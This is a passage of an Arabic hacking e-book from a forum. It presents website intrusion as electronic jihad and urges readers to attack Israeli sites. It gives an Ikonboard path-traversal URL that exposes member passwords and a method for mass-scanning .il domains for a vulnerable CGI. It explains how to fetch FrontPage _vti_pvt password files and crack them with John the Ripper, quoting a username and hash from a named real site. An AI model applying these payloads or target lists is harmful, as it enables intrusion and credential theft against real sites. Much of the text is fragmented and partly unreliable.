Sites UnDeR UtTaCk www.3asfh.com/vb ١

hi_HaCkEr & MaXhAk2000 

Sites UnDeR UtTaCk 

www.3asfh.com/vb 

١




المحتویات 

. .١ 

• 

.٢ 

.٣ 

.٤ 

.٥ 

.htaccess .٦ 

.٧ 

.FTP 

.٨ 

.Finger 

.٩ 

.١٠ شرحال .secure shell 

.١١ شرحمعنىال .Buffer Overflows 

CGI ١٢ 

• 

مق دم ة 

الف صلالأول ‏((مهارات وم صطلحاتأساسیة))‏ 

كیفیةالبحثفيالإنترنت.‏ 

الإختراقالعشوائي.‏ 

الطریقةال صحیحة والمثلىفياختراقالمواقع.‏ 

معلومات ع نالDNS‏.‏ 

شرح ملف 

نظام نقلالملفات .FTP 

الإختراق عنطریق 

بروتوكول خدمة 

لا.‏ وعلاقتها بالإنترنت.‏ 

الف صلالثاني((الحمایة واالتخفي))‏ 

‎١٣‎‏.الأمن و(((التخفي)))فيالإنترنت.‏ 

١٤. حمایة هویتكفيالنت 

‎١٥‎‏.احمي نفسك وغطي افعالك.‏ 

. 

.١٦ حمایةالمنتدیات . 

‎١٧‎‏.أمنالشبكات.‏ 

‎١٨‎‏.م صطلحات مهمة للمبتدئینفياختراقالمواقع.‏ 

‎١٩‎‏.داینامیكیةتدمیرالمواقع.‏ 

. 

٢٠. شرح برنامجالدرةلتدمیرالمواقع . 

‎٢١‎‏.تدمیرالمواقع بدون برامج.‏ 

٢٢. معلومات عن 

الف صلالثالث((‏ مقتطفات عنالسیرفرات والأنظمة))‏ 

‎٢٣‎‏.الإختراق عنطریقالیونیكود الجز ءالأول).‏ 

‎٢٤‎‏.الإختراق عنطریقالیونیكود الجزءالثاني).‏ 

٢٥. معلومات عامة عن كیفیةالاستفادة منثغراتالیونیكود 

‎٢٦‎‏.الدلیلالكامل لإختراق سیرفر .IIS 

‎٢٧‎‏.دراسة مف صلة وبعمقفيالUniCode‏.‏ 

‎٢٨‎‏.تدری ب على عملیةالإختراق بواسطةالیونیكود.‏ 

‎٢٩‎‏.در س مف صل ع نالكوكیز.‏ 

.Routing in the Internet 

Shadowلتحلیلالموقع Scan Security . 

) 

) 

) متوسط (. 

) 

) 

• 

٣٠. معلومات مهمة عنالموا قعالتيتدعمالفرونت بیج.‏ 

س&ج>)فياختراقالمواقعبثغرةالفرونت بیج.‏ 

٣٢. شرح برنامج 

‎٣٣‎‏.اماكن وجود مل فالباسوردفيأنظمةالتشغیل.‏ 

‎٣٤‎‏.اختراقالموقع الجزءالأول).‏ 

‎٣٥‎‏.اختراقالمواقع الجزءالثاني).‏ 

‎٣٦‎‏.در سفياختراقالمواقع 

‎٣٧‎‏.اختراقالSQL‏.‏ 

‎٣٨‎‏.در س مف صل ع نالSQL‏.‏ 

‎٣٩‎‏.در س لإحترافالهاكفياختراقالمواقع.‏ 

‎٤٠‎‏.استغلال لینك سفياختراقالمواقع.‏ 

٤١. شرح مف صل منالألف إلىالیاءفياحترا فاختراقالمواقع عنطریق لینك س 

. 

>) .٣١ 

‎٤٢‎‏.درس عنالShell ) PHP 

‎٤٣‎‏.درس عنالShell ) PHP 

الجزءالأول).‏ 

الجزءالثاني).‏ 

٢




‎٤٤‎‏.درس عنالShell PHP ‏(الجزءالثالث).‏ 

.٤٥ شرحأداة .anmap 

٤٦. طریقةلإقتحامالسیرفرات بدونثغرات 

. 

. 

. 

.Cross Site Scripting .٤٧ 

‎٤٨‎‏.كودتدمیر سجلالزوار.‏ 

٤٩. شرح شبه مف صل ع نالثغرات 

‎٥٠‎‏.كیفتستخدمالثغرات.‏ 

‎٥١‎‏.تمتعبإ ختراقالمواقعالإسرائیلیة مع ه ذهالثغرة 

‎٥٢‎‏.ثغرة نیوك.‏ 

‎٥٣‎‏.ثغرة .Chunked 

‎٥٤‎‏.اختراقالمنتدیات من نوع 

.vBulletin2,2,0 

‎٥٥‎‏.ثغرةفي منتدیات‎2,2,9‎ .vBulletin 

‎٥٦‎‏.اختراق منتدیات 

‎٥٧‎‏.ثغرة جمیلةفي phpفيالمواقع.‏ 

‎٥٨‎‏.ثغرةفي 

‎٥٩‎‏.ثغرهفي 

‎٦٠‎‏.ثغرةفي نو ع XMB م نالمنتدیات.‏ 

.٦١ شرحثغرة .philboard 

.phpbb 2.0.0 

.php nuke 

.Bandmin 1.4 

.٦٢ شرحثغرة .uploader.php 

‎٦٣‎‏.أف ضلالمنتدیاتالعربیة للهاكر . 

‎٦٤‎‏.أف ضل مواقعالأمن والهاكالإنجلیزیة.‏ 

‎٦٥‎‏.الخاتمة.‏ 

٣



.... 

.... 


بسماالله الرحمن الرحیم 

الحمد الله ربالعالمین والصلاة والسلامالأتمانالأكملان على سیدالثقلان وهاديالانس والجان نبینا محمد 

سید ولد عدنان وعلى اله وصحبة وسلمتسلیماكثیرا 

من منطلقاهمیة هذا العلم والذي ن حنفياحوج ما نكونالیهالانفي وقتناالحالياحببناان یكونلنا 

نصیبفي الجهادالااالله بقدر ما نستطیعفكان هذا الكتاب بذرة عملنا المتواضع هذا والذي نسألاالله یوفقنا 

وان یسددنالمافیهالخیر والنفعلكل منارادانیعلي دینااللهفي هذاالمجالفلقدتكالب تاعداءاالله علینا 

منكل جانب وبدأت الحروبالالكترونیةتغزونا منكل صوب وناحیةفیجبالاستعدادللمواجهة واعداد 

العدة من مطلققولااللهتعالى ‏((وأعدوالهم مااستطعتم منقوة ومن رباطالخیلترهبونبه عدواالله 

وعدوكم ‏))فاحببناان نبدأفي سلسلةتعلیمیة هدفها ماقد ذكرناه سابقا منتقدیم ید العون والمساعدةبما 

فتحاالله علینا وعلىاخواننا حتى نكون یدا واحدة علىاعدائنا 

فاحببتفي هذا الكتابالتركیز على دراسة هذاالعلم دراسة وافیة والابتعاد عنكل ما یسمىبالبرامج 

فضررهااكبر من نفعها ولنبدأ سویةبالدراسةالوافیةالمركزة والمتقنه علىالانظمة والشبكات 

والسیرفرات والتوسعفیهافهي طریقناللسیطرةالالكترونیة وحمایةانفسناقبلكل شئفي هذا العالم 

المفتوحالذي یسیطر علیهقراصنة الاحتكار منأعداءاالله (......) . 

ولقدبدأنا ولا ندعيالكمالفمنارادتقدیمالمساعدةاو مد یدالعونباي مشاركةكان تفلهالاجر والثواب 

منااللهتعالى سواءباقتراحاو نصیحةاو مشاركة موضوعیةاو ‏...الخ 

Sites Under 

.... 

-- مواقعتحتالهجوم -- )) 

... 

وهذا هوالجزء الأول من هذاالكتابالذياطلقنا علیهاسم 

((Attack وترقبواالجزء الثانيقریبا وفيانتظاراقتراحاتكم وماتجودبهانفسكمفي خدمة دینكم 

واخیرافانا نبریئ ذمتنااماماالله منكلاستخدام سئلما سنقدمهلكمفهو سلاح ذو حدین ‏....اللهم هل 

بلغنااللهمفاشهد 

ولقد نویناانتكونالمواضیعكلها من كتاباتنافأضفنا مواضیع من كتاباتنا ولكن رأینا منالاخوة ممنقد 

فتحاالله علیهمفي بع ضالمجالات وما كتبوههوأفضل مما سنكتبهفي بع ضالمواضیعلذلكتمارفاق 

مواضیعهمكما هي من غیرتعدیلالا مایتعلقبالتعدیلاتاللغویةاوالاخطاء الواضحة 

اذنفنصیبنا منالمواضیع ما یقارب ٤٠% والبقیةهي من نصیباخواننا ونسالااللهلهمالاجر والمثوبة 

على ماقدموه منمعلومات ستخدمامتهم ودینهمالىانتقوم الساعة 

وتقبلوات حیاتاخوانكم 

جمیعالحقوق محفوظةل:-‏ 

..... 

.... 

+++++++++++++++++++ 

+ hi_HaCkEr – 

+ MaXhAk2000 

+++++++++++++++++++ 

أبو مجاهد 

منتدیات العاصفة 

وااللهالموف ق،،،‏ 

http://www.3asfh.com/vb **** 

٤




الفصل الأول 

 

‏((مهاراتوصطلحات 

أ ساسیة))‏ 

٥

hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk 

كیفیة البحث في الإنترنت 

" 

" 


. 

$$$$$$$$$$$ 

الكاتب:بلاكهنتر 

$$$$$$$$$$$ 

...... 

لأهمیة هذاالموضو عبالنسبةلكل مخترق مواقعلكي ی حصل على ما یرید من مراجع حول نظاممعیناو 

برنامجمعیناوثغرةمعینةفهو مناكثرالناساستخدامالمحركات البح ث واسالوا مخترقيالمواقع عن 

اهمیة محركات البحثبالنسبةلهم ..... 

ولابدانتعلمان محركاتالبحث ما وجدتاصلاالالأجلك لت حصل على ماترید وباقصر وقت ممكن ولابد 

انتعر فایضاانا غلبها متخص صفي مجالمعین علىالأغلبفلاتبح ث مثلا عنبرامج هكرفي محركات 

ب حث سیاسیة مثلا وهكذا ...... 

بالنسبه مثلاللجوجلانااعتبرهالمحركالذكيفهویعر ف ماذا كتبت وانكنتقدأخطأتفي كتابة الكلمة 

فهوتلقائیا سیعطیكفي بدایةنتائج البحث سؤال ‏...هلانتتقصدكذا ... و غالبا ماتجدالذيكنتتب حث 

عنهفياوائل صفحاتنتیجة البح ث 

بالنسبهللیاهوهوایضا ذكي ولكن ذكائهیعتبر ذكاءتجاري حیثانه یقدملكالمواقع التجاریهالتيیتعامل 

معها وفیها ماكنتتب حث عنهثم المواقعالتجاریه ا لتي لایتعاملمعها المحركثمالمواقعالعامه وهي ما 

كنتتب حث عنه 

سؤال ‏/الكثیر منالناس واناالاحظهاكثیرافمثلا عنديفيالمنتد ى وكذلكفي جمیعالمنتدیا تاجدالكثیر 

مثلا یطلب مثلابرنامجالسب سفن ‏!!!!!!!!لماذ ؟ هذا مثال عنأشهربرنامجاختراق والامثلةكثیرة 

حسنا ‏...قليانت مالفر قبینك وبینالشخ صالذيتطلب منهبرنامجاو موقعمعیناو غیره وهو یستطیع 

ایجاده وانت لاتستطیع ؟؟؟ 

صح ‏//الفر قبینك وبین هذاالشخ ص ‏..ان هذاالشخ صیتمیز عنكبانه یجید التعامل مع محركاتالب حث 

على عكسكتماما 

الان سنقومبشرح الطریقة المثلى لعملیةالبح ث 

طریقهبسیطه جدا وهي عبرتقسیمالمواقعالى 

مواقعتجاریه ولها محركاتبح ث مهتمةبها 

مواقعبرامج ولها محركاتبح ث مهمةبها 

مواقع ملتیمیدیا ولها محركاتبح ث مهتمةبها 

مواقع سیاسیه واخباریه ولها محركاتبح ث مهتمةبها 

مواقع هاك ولها محركاتبح ث مهتمةبها 

مواقعكراك ولها محركاتبح ث مهتمةبها 

مواقع سكیوریتي ولها محركاتبح ث مهتمةبها 

مواقع هاردویر ولها محركاتبح ث مهتمةبها 

منتدیات ولها محركاتبح ث مهتمةبها 

وانا افضل دائما محركبحث جوجل لتوفر جمیع المجالات ضمنهتقریبا ولسوابقةالمشهودلهبها منكل 

هكرفهوبالنسبةلي افضل موقعلكل هكر 

طیبالاناذاأردت الب حث عنبرنامجمعین ما هيافضل واسر عالطر قللوصوللهذا البرنامج ؟ 

انا متأكدبانكلوفكر تقلیلا ستجیب عليبهذاالاجابة ... 

.... 

: 

: 

..... 

.... 

٦




اولااذهبالى مواقع الب حث عن البرامج وأضعاسمالبرنامج المطلوب وفي نهایةاسمالبرنامجأضع 

الامتداد الذي غالبا ماتكون علیه هذهالبرامج 

أو 

مثلااناابح ث عنثغرهأعر ف نوعها ولكني لاأعر ف مصدرها وارید مرجعلها لزیادةالاطلا ع ماذاأفعل 

؟؟؟ 

ولتكن مثلاثغراتال 

اذهباولالمواقعالسكیوریتياب حث عنكلمة XSS ستكونلدیكنتیجةبح ث لا بأسبها عن كل مایتعلق 

بها 

الجوجل سیعطیناكمیةكبیر منالمواقع والمراجعالمتعلقةبما نبحث عنهلذلك یجبان نضیق نطاقالب ح ث 

حول المطلوبفق ط ولذلك علي بتحدید البح ث بعلامه ) + ( واذااردت فعلياناب حث عنبجز Bugs و 

اكسبلویتباسم الثغره فعليان اكتب : 

مثلاابحثعن ثغرات IIS سأكتب 

وهكذا 

الان ساضعلكم مجموعه منالمواقعالتيقدتفیدكمفي عملیةالبح ث : 

prog.exe 

CSS واللياختصارها XSSاو Cross Site Scripte 

Prog.zip 

أواذهب الى جوجل واكتب xss+ exploit + bug 

XSS+BUG+EXPLOIT 

IIS+exploit+bug 

: 

اناأسمي هذا الموقعبخادم الهكرز وسید الهكرز وووووكل ما ست طلقه على هذاالموقعفهو یستحقأكثر 

/http://www.google.com : 

محركاتبحث عادیه ومتقدمه 

/http://www.altavista.com - /http://www.yahoo.com : 

/http://hotbot.lycos.com - /http://www.lycos.com - 

- http://news.bbc.co.uk/hi/arabic/news : 

http://www.aljazeera.net/ - http://arabic.cnn.com/ 

مواقع سیاسیه واخباریه 

مواقع سكیوریتي : 

- http://www.securiteam.com/ 

- http://www.ussrback.com/ - http://www.securityfocus.com/ 

- http://www.ntsecurity.nu/ - http://www.ntbugtraq.com/ 

http://www.ntsecurity.com/ 

وأناتصلنياخرالثغرا ت علىبریدي من خلالالاشتراك یقوائمهم البریدیة وأنصحالجمیعبالاشتراكفي 

قوائمهمالبریدیة 

http://drivers.online.net.nz/ 

- http://www.asus.com/ - http://nvidia.com/ 

http://www.amdmb.com/ - http://intel.com/ - 

+++++++++++++++++++++++++++ 

: 

مواقع هاردویر : 

أیضا هنالك بع ضالمهارات المهمةفيالتعامل مع محركاتالب حث 

‏*-*البحث ضمننتائجالبح ثالحالیة ..... تتیح بع ض محركات البح ث هذهالخاصیة واقرب مثال جوجل 

حیثاني مثلالكيأب حث عنثغرةمعینةفانياكتب مثلا exploit ثم بأسفلالصفحة ستجد خیارالب حث 

ضمن النتائ جالحالیة ‏....فاب حث عنثغرتك ضمن هذه النتائجالموجودةفمثلااكتب list.php3 لتعر ف 

الثغرة الموجودة ضمن هذاالبرنامج 

‏*-*أیضااستخدم + و ‏–فمثلا 

Exploit + bug + anyprog 

فانالنتائج لابدانتحتوي على جمیعالكلماتالثلا ثفي جمیع النتائج 

.... وهكذا 

٧




Exploit - bug - anyprog 

فانكتخبرهبان النتائج یست حسنانتكونتحتوي على هذه الكلماتالثلا ثفانلمفضع الموجود سواء 

كلمتیناوكلمة 

.. 

*-* " أقوى منتدیات هكر " 

عند الب حث عن مجموعةكلمات وبنفسالترتیبفاننا یجبان نحددها بقوسین صغیرینكالمثال الذي 

بلأعلى ... وهكذا...‏ 

٨


" 


: 

" الإختراق العشوائي 


$$$$$$$$$ 

الكاتب : 

$$$$$$$$$$ 

الكندور 

- 

ماهو الإختراق العشوائي Random Hacking 

‏-تطویرهب حیث یصبح یب حث على إ ستثمارات غیرال 

‏-كی فتستغلايثغره بعدال حصول علیها 

CGIScripts 

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ 

- ماهو الإختراق العشوائي Random Hacking 

هوالبحثفيكمیهكبیره من المواقع عنثغره محدده ، وهذا سهل ویعودبمواقعكثیره جدا جاهزه 

للإختراق ، مثالبسیط جدا ، روح على محركب حث ، من محركاتالبح ثالتيتعتمد علىال spidersأو 

إرجعلشرح زوروفي ریاضیات 

العناكب مثل altavista.com وأكتب 

الب حث)‏ مثلا نب حث عنلنكلملفبإسم 

كلهاتملك منتدى ،Ikonboard إفتح واحد منها وأبحثفيالمصدر الكود HTML عنالسكربت الذي 

بحثت عنه help.cgi لتعر فاین مكانه ‏،لنفر ض مكانههنا 

أكتب بعدالملف غیر العنوانلیصبح 

) ، link:xxxx.cgi or pl 

help.cgi ، link:help.cgi المواقعالمردودهلكنتیجهللب حث 

http://www.example.com/cgibin/help.cgi 

http://www.example.com/cgibin/help.cgi?helpon=../members/[member].cgi%00 

[] 

Ikonboard 

مع ملاحظهتغییر ‏[‏member‏]بإسم عضو وبدون القوسین طبعا 

سو فیعر ضلكمعلوماتالعضوكامله ومن ظمنهاكلمة المرور وهذه الثغرهل المنتدى 

2.1.7 وهذالیسلب موضوعي ولكن هيبدایه ومثال لاتحفظهلأنيأحضرتأبس ط مثالفقطفیوجد غیره 

مئاتبل آلا ف ملفاتال CGIScriptتملكثغرات مثل هذه واغلب إ ستثماراتهاتكون من خلال 

لل حصول على مثل هذه ا لإ ستثماراتلثغرات ملفاتالسي جي آي سكریبت شو فالأرشی ف هذا وهولغته 

روسیهأعتقد ولكن ما یهملأننا نب حث عنال Exploitأو ا لإ ستثمار 

/http://www.secure.f2s.com/eng_ver/bugs 

وممكنتأخذإسمالمنتج مثلاوتضعهفي محركالب حثل /http://www.securiteam.com 

وتشو فالنتائج ‏،أوتشتركفيالقائمهالبریدهل سیكیورتيفوكسفهي مفیده جداأنا شاركت منقبل فتره 

url 

وجداأعجبتبها وهي مختصهفيالأمن ولیسلثغراتالسي جي آ ي سكربت،‏ یعنيامن واخبار وكل شئ 

.... ویوجدبرنامجتقدمه سیكیورتيفوكسيبإسم سیكیورتيفوك سبیجر ، هوبرنامج لتسهیل عملیه 

ال حصول على الأخبار ووو...‏ الخ 

‏-تطویرهب حیث یصبح یب حث على إ ستثمارات غیرال 

!! 

CGIScripts 

(: 

ا لإختراقالعشوائيإ ذاكان فعلا عشوائي،‏ یعنيتخترقاي موقع ولوبدون سببفهذههمجیه ‏،لكن 

ممكن نستفید منهإ حنافيأنه ما یكونفي شكل همجي ‏،أنااقوللككی ف ، مثلاإسرائیلالليالكل یكرهها 

، الذین یأمرونالفلسطینیین بأوقا فإ طلاق النار ‏،الكل یكرههملی سلأجلأنهم یهود ، لا نكرههملأنهم 

ظلموافلسطین ، عندهم موقعفیه آلا ف من مواقعهم هذاهو 

sitesتنتهيب ١٢٦١٠ co.il و ١١٠٤ 

٩




sites‏.تنتهيب gov.il وهذه مهمه ، و 

sitesتنتهيب sitesتنتهيب 

sites‏.تنتهيب 

و.‏ 

sites‏.تنتهيب 

و.‏ .il - sites ‏........عشانت حصل علىكل هذه السایت روح الموقع هذا 

ac.il و ٧٨ 

org.il و ٧٠ 

muni.il و sitesتنتهيب ٢٠٠٩ ، com و 

sites‏.تنتهيب ٥٤ net.il و ٢٩ 

israel.net - 84 ، لعینه .edu - 4 sites org - 121 sites و net 

١٣٧ 

sites 

http://iguide.co.il/sites/sites.htm 

وفیهكمان محركاتب حث 

/http://www.achla.co.il 

http://www.reshet.co.il/data/index.vs?dw=1 

/http://www.maven.co.il 

/http://www.tapuz.co.il 

/http://www.walla.co.il 

http://www.info.gov.il/find.pl 

وفیه محركأعدم منها والليهو 

altavista.co.il 

المهم علىكل شخ ص مناأن یصلحفرزللبیاناتالموجودهفي هذهالمواقع ، یستخدم اللغهالتي ی تقنها 

لیصنعبرنامج یصلحفرز ویضعهافي مل فتكستبدوناشیاءثانیهمعها 

/w 3 - msql 

العملیهالثانیههيالب حثفیهاكلها عن منتج ، مثلا ‏،الطریقه سهله جدا ‏،أولایتمالشبك مع 

بروكسي مثلا 8080: proxy.isp.net.sa وثم یرسللهأمر ، GET مثلاترسلللبروكسي 

cgi- 

GET http://www.com.il/cgi-bin/w3-msql/ HTTP/1.0 

*/* ،Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg 

Accept-Language: ar-sa 

(User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows 98 

Host: www.com.il 

Proxy-Connection: Keep-Alive 

وهو یطلب من البروكسيأحضارالموقع http://www.com.il/cgi-bin‏/،یتضح طلبنال 

‏،فيالحقیقه لا نب حث عنثغرات سي جي آي ، ولكن نب حث عنكل المواقعالتي یوجد 

بهاالمنتج ،WWWMSQL یعنيالمواقعالإسرائلیه مثلاالتي جمعناهافي مل فتكس تكلهاتأخذ واحد 

وثم یحفظ 

واحدوتدخلفي البرنامج الذي صممناهوترسل الى البروكسيبحثا عن 

ردالبروكسيفي مل ف خارجي ، وهكذا حتى ننتهي منكلالمواقع ، وثم نفتحالمل ف ونشو فالتيتمإیجاد 

المنتج WWWMSQL داخها والتيلم یوجد ، ونتوجهالى سیكیورتيفوكس والا سیكیورتيتیم والاأي 

موقع یعجبك واب حث عن ، w3-msql مثلافي سیكوتيتیم نجد Exploitل 

منالمتصفح ، وهو هنا 

http://www.securiteam.com/exploits/2WUQBRFS3A.html 

cgi-bin/w3-msql 

w3-msql یمكنتطبیقه 

/bin/w3-msql 

١٠

hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb 

طریقهفح ص عده مواقعبحثا عن منتجفیهاأسمیهاانا Randomیعنيإختراق Hacking عشوائي ، 

ولكنلو فعلابحثت عن wفيالمواقعالإسرائلیهفأنا 3 - msql أقوللك بأنك ما را حتلقىكثیرأولنتجد 

شئ ، ممكنتب حث عن /vti_pvt_/ لترصدكل المواقع التيفیهافرون تبیج ، وطبعا بعد مایتم حفظكل 

المعلوماتالمسترجعه من البروكسيتكونبشكل HTML عشانكذاأنت خل المل ف یكونبنسق 

وافتحهوتجدكل المواقع ‏،اللي كتب عنها 

الخ ، من هذهالردودتعر فاللي نتفاوند والا موجود ولكن 

غیر مسموحبالوصولله الخبهذهالطریقهتعر ف اللي موجود علیه واللي مو موجود ‏.....والباقي علیك 

html.* 

displayed.. The page cannot be واللي 

.... not found.... واللي Forbddien 

.. 

‏-كی فتستغلايثغره بعدال حصول علیها؟؟ 

إ ذاكانت url ما یبغالهافلسفه ‏،كود c وما عرف تتشغلهأوقابل تفیهأخطاءفممكنتب حث عنفرجون 

ثانيله ولكنبلغه perlأو Shell *.sh وهوالذي یقابل Batchفي ویندوزوتحدثنا عنهافيكوكب 

لغاتالبرمجه ، من الدوس بعد ماتثبتأكتی فبیرلأكتب perlإ exploit.pl ذاكان ال exploitبلغه 

بیرل ولكن طبعافیهأشیاءتغییرهافيالكود نفسه ، وهذهالأشیاءتكون مكتوبهبین علاماتالتعلیقات 

وأكید بتواجه مشاكلإ ذا ماتعر ف شئفيبیرل ‏،في هذهالناحیه لاتطلب شرحبالصور ‏:)إ ذا رجعلك رد 

طویل ماقدرتتقراه ممكنتحفظالخرج عن طریق علامة > وثم مسافه وإسم المل ف مثلا 

(: 

perl 

exploit.pl > log.htm 

وبالنسبهللمنتجأكتی فبیرلفقطتواجهفیه مشاكل ‏،لأن بع ض ال Exploit كتبفيالإ صدارأربعه 

وممكن خمسه وممكن مایعمل زینفيأكتای فبیرللذلكقدتضطر لتغیر المفسر عندكأوتعدلفيالكود 

فیه مفسربیرل ممتاز 

وهذاكله یطلب خبرهفياللغه ، وعلىفكرهلیونكس أعمل على 

جداافضل منأكتی فبیرل بعشراتالمرات...‏ 

( RedHat 6.2 

) 

١١


" 

الطریقة الصحیحة والمثلى في اختراق المواقع 

" 

... 

$$$$$$$$$$$$$$$ 

الكاتب marwan911: 

$$$$$$$$$$$$$$$$ 

اول خطوةفيالاختراق واللي هياخذالمعلومات 

یعنينعر ف الموقع الفلاني شنهوالملقماللي شغال علیه والنظام والخدماتاللي یدعمها.‏ 

الملقماتاشهرها اثنین :: 

:IIS من مایكروسوفت وهذه ملیانةثغرا ت.‏ ‏(ومواقعقلیل مقفلةثغراتها)‏ 

:apache من مجموعة مبرمجین متوزعینفيانحاء العالم واختراقها شبهصعب.‏ 

طیب 

ال حین عندنا موقع 

وشلوننعر ف نظامالتشغیل والملقم والخدمات والمعلوما تكلها 

عندك الموقع http://www.netcraft.net 

ادخله 

تلاقي مربع 

هنات حطفیه الموقع الليتبيتعر فالمعلومات الليفوق 

مثلا نحط موقعالبیتالابی ض اللي هو whitehouse.org 

ملاحظة:‏ نكتبه من غیر //:http ولا ‏/الليبالا خیر 

http://uptime.netcraft.com/up/graph....whitehouse.org 

را ح یطلعلناالتالي 

The site www.whitehouse.org is running Microsoft-IIS/5.0 on Windows 

2000 

طیب 

ال حین عرفنامعلومتین مهمتین 

١٢


Sites UnDeR UtTaCk www.3asfh.com/vb 

اول شيءانه شغال علىالملقم 

IIS5.0 

ثاني شيء شغال على نظام ویندوز 

حلو 

٢٠٠٠ 

IIS5.0 علیه 

اول شيء نجربثغرات ‏(راحاحطها بعدالموضو ع)إ ذا مانفع شيء نشو فثغرات نظام 

ویندوز ٢٠٠٠ ‏(راحاح طالموقع بعد الموضو ع)‏ 

طیب ..... ال حینفیه حاجةاسمها یونيكود ‏......هذهتختر قفیها عن طریقالمتصفح 

وماتمشيإلا مع ملقمات IIS وهي عبارة عن عناوین طویلةت حطها بعد عنوانالموقع.‏ راحاحطامثلة 

علیها.‏ 

طیبلنفر ضانه ماطلعفیهاثغرا ت؟ 

نشو ف محتویاتالموقع نفسه 

نشو فإنكان عنده سجل زواراو منتد ىاواواو ونطلعثغراتها منالموقع اللي راحارفقهفي الرداللي 

بعدالموضوع.‏ 

طیبلوكانالسیرفراباتشي؟ 

خلونا ناخذ مثال موقعارانك arank.com.www 

لو حللناهبالنیتكرافت را ح نشو فالنتیجةالتالیة 

The site www.arank.com is running Apache/1.3.20 (Unix) 

mod_gzip/1.3.19.1a mod_perl/1.26 mod_bwlimited/0.8 PHP/4.0.6 

mod_log_bytes/0.3 FrontPage/5.0.2.2510 mod_ssl/2.8.4 OpenSSL/0.9.6 

on Linux 

طیب هنا یهمناثلا ثاشیاء 

طیب 

الملقم وهو apache 1.3.20 و دعمفرون تبیج FrontPage/5.0.2.2510 وهذه ملیانةثغرات 

والثال ث النظام وهو 

الملقم 

Linux 

اول شيءاباتشي منالملقماتالصعبة ا لإختراق إلا بع ضالإ صدارا ت منهافنحط هذه على جنب.‏ 

نشو ف دعمالفرون تبیج 

١٣




زي ماقلناالفرون تبیج ملیانثغرات 

وثغراتهقویة وكثیرةتقریبا 

منها مجلد 

vti_pvt_ و 

private_ هذهاللي نحتاجها غیره مامنهفایدة 

داخلالمجلدین راح نلاقياربع ملفات مهمة وهي service.pwd و users.pwd و 

authors.pwd و adminstators.pwd ویعتبر هذااخطر مل ف 

طیبلوقدرنا ننزل واحد منالملفات هذه ‏(ملاحظةالثغرة هذه موجودة ب 

عالن ت)لو نزلناها نفتحهابالمفكرة ونلاقي السطر هذا على سبیلالمثال 

goodyco:CalXS8USl4TGM 

٧٠% من المواقعالموجودة 

وهذا من موقعقودي http://www.goody.com.sa/_vti_pvt/service.pwd 

طیبال حین goodycoالیوزر والباسس مشفر واللي هو CalXS8USl4TGM 

وشلون ینفك؟ ینفك ببرنامجاسمه 

john the repaier 

تنزلهوتح ط المل ف المشفر ‏(معالیوزر)بمجلد واحدوتفتحالدوسوتروحلمجلد جوهنوتكتبالسطر 

التالي john -i PASSWORD.FILE 

وعاداستناه یطلعلكالباسس 

طیب نرو حللفقرةالثالثة واللي هيالنظام 

زي ماشفنا النظام هولینكس 

لكنلینكسای ش؟فیه رید هات و ماندریك وفیه منهإ صدارتكثیروثغرات اكثر 

لكن هنا راحتواجهك مشكلتین 

اول شيءمعرفةالنظامتقدرتطلعه منابداوتشغیل ول telnet واكتب عنوانالموقع یطلعلكالنظامفوق 

نوعه وإ صدارته 

المشكلةالثانیة لازم یكون عندكلینكساصلا 

علشانثغراتهبلغةال c وهذه ماتشتغلإلا عاللینكسفقط 

================ 

١٤




/http://neworder.box.sk هذاالموقع مفید جداتكتب مثلا ‏(فوقبالمربعاللي عالیمین)‏ IISاو 

apacheاو منتد ى واصدارتهاوايبرنامج ویطلعلكثغراته 

http://www.ussrback.com‏/الموقع هذا خطیر جداً‏ جداًتروح ل EXPLOITSاللي عالیسار 

وتختاراولاختیار هناثغرات جمیعالانظمة منلینكس و ویندوز و و والخ..‏ ومنوعة من 

یونيكود...‏ 

c و perl و 

١٥



" معلومات عن ال " DNS 


$$$$$$$$$$$$$$$$$$$ 

الكاتب:‏ ACID BURN_EG 

$$$$$$$$$$$$$$$$$$$ 

ماهو ال ؟؟؟ DNS 

============== 

DNS ‏:هواختصارلكلمه Domain Name System ویتصل سرفرال DNS عادة علىبورت 

٥٣ ممایعنىانكاذااردتالاتصاللأحدالمواقع واستعملتال DNSلهذاالموقعفسوف تتصلبه عن 

طریقالبورت ٥٣ و سوفیترجماویحولال translates alphabetical hostnames ویعنى 

اسم الموقع مثل : http://www.3asfh.com/ الى IP ADRESSES مثل ,١١١٫ ١١١٫ ١١١ 

١١١ و العكس ص حیح و عندما تتمالعملیه تتصلبالموقع مباشره و عملیه التحویل هذهتسمى 

addressاىتحویلاوت resolution حلیل عنوان الموقع الى IP اوالعكسلنستطیعالاتصالبه 

قبل ظهورال DNSكاناسماخر لعملیهال.‏ address resolution ولكنقد ظهرال DNS لجعل 

تذكر عناوین المواقع وحفظها اكثر سهولة ومرونة من ذيقبل حی ثقبل ظهور هذهالخدمةفانكللدخول 

لموقعمعین یجب علیك كتابةال ipلهذاالموقعللدخولالیه address وكانالاسم المستعملله 

قبلال DNSكانیتكون من مل فاسمهال HOST FILE وكان عباره 

عناسماء الهوستسا ىالمواقع و عنواوینال IP الخاصهبهم وكان هذاالمل ف تتولى رعایته 

، و 

address resolution 

(SRI-NIC). Stanfordو Research Institute's Network Information Center 

. 

كان على هذاالراعى ان یجد ث (UPDATE) الجدول هذا حوالىكلاسبوع و یمدهبالعناوین الجدیده و 

الارقام التى ظهرت و علىالسیستمادمینان یجدد هوالاخر ملفهاو عن طریق اتصالال FTPبینه و 

بینلراعىاى.‏SRI-NIC وبعد فترة من الزمن رأوفيان هذهالطریقة غیره مجدیة وغیرفعالة ومع 

تطور خدمةالانترنتكل ذلكأد ى الى ظهور ال DNSلیفعل ذلك.‏ 

وال DNSلیسله مركزاى decentralized اىانهلیس هناكمكانمعیناو نظاممعینیتحكمفىكل 

ال DNSبلبال عكسفال DNS عباره عنقاعدةبیبانات موزعهبشكل منظم وتوجد علىأمثرمن سیرفر 

وكل سیرفر علیه DNS یعر فاین یبحث عندما یریدانی حصل علىمعلومهمعینهاوهوستمعیناو 

یریدتسجیللدومین جدید 

هذهكانت مقدمة مبسطة عن هذهالخدمة واهمیتها 

... 

SERVER: THE DNS خادم الدياناس : 

================================ 

ال DNSهو SERVER عباره عنكمبیوترویعمل عادتا على نظام UNIX أولینكس و یستخدم 

